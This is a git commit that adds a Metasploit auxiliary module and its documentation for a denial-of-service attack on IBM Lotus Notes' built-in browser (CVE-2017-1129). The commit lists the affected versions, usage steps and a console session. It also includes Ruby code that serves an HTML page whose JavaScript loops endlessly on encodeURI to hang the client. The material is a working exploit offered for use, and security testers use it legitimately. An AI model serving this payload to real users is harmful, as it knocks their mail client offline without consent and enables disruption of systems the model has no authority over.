Land #8989, IBM Lotus Notes DoS (CVE-2017-1129)
This commit is contained in:
commit
a3d47ea838
|
@ -0,0 +1,63 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.
|
||||
|
||||
JavaScript is used to create an object instance of encode URI within an infinite loop,
|
||||
leading to a Denial of Service of the IBM Lotus Notes app itself.
|
||||
|
||||
Vulnerable app versions include:
|
||||
* IBM Notes 9.0.1 to 9.0.1 FP8IF1
|
||||
* IBM Notes 9.0 to 9.0 IF4.
|
||||
* IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
|
||||
* IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
|
||||
* IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
|
||||
* IBM Notes 8.5 release
|
||||
|
||||
Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385
|
||||
|
||||
## Verification
|
||||
|
||||
1. Start msfconsole
|
||||
1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
|
||||
1. Set `SRVHOST`
|
||||
1. Set `SRVPORT`
|
||||
1. run (Server started)
|
||||
1. Visit server URL in the built-in web-browser of IBM Notes client application
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use auxiliary/dos/http/ibm_lotus_notes
|
||||
msf auxiliary(ibm_lotus_notes) > show options
|
||||
|
||||
Module options (auxiliary/dos/http/ibm_lotus_notes):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL false no Negotiate SSL for incoming connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
WebServer
|
||||
|
||||
|
||||
msf auxiliary(ibm_lotus_notes) > set SRVHOST 192.168.0.50
|
||||
SRVHOST => 192.168.0.50
|
||||
msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
|
||||
SRVPORT => 9092
|
||||
msf auxiliary(ibm_lotus_notes) > run
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(ibm_lotus_notes) >
|
||||
[*] Using URL: http://192.168.0.50:9092/ImlbHZVXlvTEXYd
|
||||
[*] Server started.
|
||||
msf auxiliary(ibm_lotus_notes) >
|
||||
```
|
||||
|
||||
At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.
|
|
@ -0,0 +1,59 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => "IBM Notes encodeURI DOS",
|
||||
'Description' => %q(
|
||||
This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
|
||||
If successful, it could cause the Notes client to hang and have to be restarted.
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Dhiraj Mishra',
|
||||
],
|
||||
'References' => [
|
||||
[ 'EXPLOIT-DB', '42602'],
|
||||
[ 'CVE', '2017-1129' ],
|
||||
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
|
||||
],
|
||||
'DisclosureDate' => 'Aug 31 2017',
|
||||
'Actions' => [[ 'WebServer' ]],
|
||||
'PassiveActions' => [ 'WebServer' ],
|
||||
'DefaultAction' => 'WebServer'
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def run
|
||||
exploit # start http server
|
||||
end
|
||||
|
||||
def setup
|
||||
@html = %|
|
||||
<html><head><title>DOS</title>
|
||||
<script type="text/javascript">
|
||||
while (true) try {
|
||||
var object = { };
|
||||
function d(d0) {
|
||||
var d0 = (object instanceof encodeURI)('foo');
|
||||
}
|
||||
d(75);
|
||||
} catch (d) { }
|
||||
</script>
|
||||
</head></html>
|
||||
|
|
||||
end
|
||||
|
||||
def on_request_uri(cli, _request)
|
||||
print_status('Sending response')
|
||||
send_response(cli, @html)
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue